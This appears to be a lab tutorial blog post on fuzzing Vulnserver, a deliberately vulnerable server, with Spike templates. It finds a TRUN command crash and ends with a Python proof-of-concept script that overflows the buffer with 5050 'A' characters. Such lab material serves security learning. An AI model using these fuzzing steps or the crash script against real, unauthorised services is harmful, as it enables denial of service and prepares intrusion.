Vulnserver is a program which intentionally contains vulnerabilities. After starting the program, it listens on the port 9999, however other port can be used if we pass the port number as the first argument. For example the following command starts the vulnserver on port 6666
Vulnserver can be downloaded from here.
Spike is a program which sends crafted packages to an application in order to make it crash. The packages can be defined as templates. Spike is capable of sending both TCP and UDP packages. Vulnerabilities can be found in applications with the help of Spike. Spike is part of the Kali distribution.
In this post I will demonstrate the usage of Spike against Vulnserver. Vulnserver is running on a Windows XP. I also use OllyDbg v1.10 as debugger.
1. Identify the protocol of Vulnserver
Start Vulnserver on Windows XP. On Kali, connect to Vulnserver with netcat.
nc -nv <WinXP IP address> 9999
Type HELP. This will list the available commands.
You can try other commands, not listed here. You can also try commands without parameters (or lowercase).
You can also use Wireshark to explore the communication between client and server, and determine the used package format.
The purpose of this step is to identify the used protocol.
2. Create Spike templates
Spike templates describe the package formats of the communication. We can tell Spike, which parameters should be tested. For example, the following template will try to send various commands to Vulnserver.
This template, however, will send STAT command with various parameters.
s_readline(); s_string("STAT "); s_string_variable("0");
We have a couple command, so that we can create similar templates for each command.
3. Send packages to Vulnserver with Spike
Spike is capable of sending TCP and UDP packages. For TCP packages, we use the generic_send_tcp command. The proper form is:
generic_send_tcp <IP address> <port number> <template name> <SKIPVAR> <SKIPSTR>
If the template contains more than one variable, we can test each one if we specify different values for SKIPVAR. In our case this is always zero.
Spike sends packages with different strings in place of variables. We can start from a certain point in the test if we specify value for SKIPSTR. If this value is zero, then SPIKE starts from the beginning.
Before we start to send packages, we have to set the environment first.
- On Windows XP, Start vulnserver.
- Start OllyDbg and attach to Vulnserver, then press the triangle, so that the debugger is not stopped.
- On Kali, start Wireshark and start capturing.
Now we are ready to send packages with Spike. Try this one first.
generic_send_tcp 192.168.2.132 9999 command.spk 0 0
Watch OllyDbg and wait, until the application crashes.
Unfortunately the application does not crash. Restar capturing in Wireshark and try the next template.
generic_send_tcp 192.168.2.132 9999 help.spk 0 0
Still nothing. Test each template.
When there is a crash, we can find the last package in Wireshark. We can create a python script which sends the same package to the application. Then we will use this python script as proof of concept.
For example trun.spk causes the application crash.
The crash happened at the second package. There is no welcome mesage after that. Let us find the package in Wireshark.
We have the format and size of the package that causes buffer overflow. The PoC python script:
#!/usr/bin/python import socket import os import sys host="192.168.2.132" port=9999 buffer = "TRUN /.:/" + "A" * 5050 expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) expl.connect((host, port)) expl.send(buffer) expl.close()
The following templates will cause the application crash:
In the next posts I will show you how you can create exploit from the proof of concept python script.